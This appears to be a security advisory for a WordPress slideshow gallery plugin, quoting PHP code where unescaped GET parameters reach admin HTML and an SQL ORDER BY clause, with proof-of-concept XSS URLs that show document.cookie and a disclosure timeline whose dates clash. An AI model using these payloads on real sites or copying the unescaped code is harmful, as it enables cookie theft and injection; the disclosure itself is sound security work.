$_GET['order'] is not escaped.
File: slideshow-gallery\views\admin\galleries\index.php
$orderby = (empty($_GET['orderby'])) ? 'modified' : $_GET['orderby'];
$order = (empty($_GET['order'])) ? 'desc' : strtolower($_GET['order']);
<th class="column-id <?php echo ($orderby == "id") ? 'sorted ' . $order : 'sortable desc'; ?>">
<th class="column-title <?php echo ($orderby == "title") ? 'sorted ' . $order : 'sortable desc'; ?>">
<th class="column-modified <?php echo ($orderby == "modified") ? 'sorted ' . $order : 'sortable desc'; ?>">This value can be also used for SQL injection:
File: slideshow-gallery\vendors\class.paginate.php
list($osortby, $osort) = $this -> order;
$query .= " ORDER BY `" . $osortby . "` " . $osort . " LIMIT " . $this -> begRecord . " , " . $this -> per_page . ";";In Pro version, if you have more than 10 galleries, $_GET['Gallerypage'] is not escaped.
File: slideshow-gallery\vendors\class.paginate.php
$this -> pagination .= '<input class="slideshow-paged-input current-page" type="text" name="paged" id="paged-input" value="' . $this -> page . '" size="1"> ';Proof of Concept
XSS are visible for administrator.
http://wp/wp-admin/admin.php?page=slideshow-galleries&orderby=modified&order=asc-- \"><script>alert(document.cookie);</script>If you have PRO version and more than 10 galleries:
http://wp/wp-admin/admin.php?page=slideshow-galleries&Gallerypage=\"><script>alert(document.cookie);</script>Timeline
- 02-12-2015: Discovered
- 02-12-2015: Vendor notified
- 23-04-2015: Version 1.6.1 released, issue resolved
